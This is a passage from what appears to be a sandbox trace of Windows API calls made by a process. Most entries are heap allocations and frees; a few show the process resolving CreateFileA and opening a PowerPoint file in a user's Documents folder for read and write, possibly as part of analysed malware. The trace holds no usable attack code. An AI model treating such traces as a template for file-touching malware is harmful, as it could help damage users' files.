hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.693] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.694] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0170.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd810, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0170.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.695] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0170.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0170.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0170.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0170.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd810, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.695] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0170.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa6b008 [0170.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0170.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db0a8 [0170.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", cchWideChar=61, lpMultiByteStr=0x8db0a8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps", lpUsedDefaultChar=0x0) returned 61 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0170.697] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\im npo61dtlm5sbx.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0170.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0170.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0170.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0170.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0170.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a) returned 0x9c0c88 [0170.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=61, lpWideCharStr=0x9c0c88, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.pps") returned 61 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0170.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.701] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0170.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0170.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0170.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0170.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0170.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0170.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.702] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0170.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0170.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0170.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0170.703] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0170.703] RtlAllocateHeap (HeapHandle=0x8a0000, 